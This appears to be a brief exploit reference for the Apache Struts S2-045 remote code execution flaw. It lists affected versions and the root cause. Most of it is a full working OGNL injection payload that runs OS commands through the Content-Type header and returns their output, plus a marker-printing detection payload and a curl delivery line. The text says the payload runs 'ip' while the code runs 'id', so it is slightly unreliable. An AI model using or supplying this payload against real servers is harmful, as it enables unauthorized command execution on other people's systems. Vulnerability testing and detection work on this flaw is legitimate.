s2-045-remote-code-execution
S2-045 Remote Code Execution
Affected Versions
Vulnerable Struts versions include:
- 2.3.5 – 2.3.31
- 2.5 – 2.5.10
Root Cause
- Struts evaluates OGNL expressions in the
Content-Typeheader - Triggered when multipart parsing fails
- OGNL restrictions are bypassed, allowing:
- Arbitrary Java method execution
- OS command execution
The vulnerability is in file upload handling, but no upload feature is required to exploit it.
Testing Payloads
Core Exploit Payload (RCE)
%{(#n='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
- Executes
ip - Sends command output in HTTP response
Detection Payload (Safe Testing)
Instead of executing commands, print a marker:
%{(#n='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter())).(#ros.print('\ntest\n\n'))}
Detection Using Curl
detect.sh
curl --header "Content-Type: [PAYLOAD]" http://TARGET/
Vulnerable Response
test
- Confirms OGNL execution
- No command execution required
- If RCE payload is used, Output of OS command is returned in HTTP response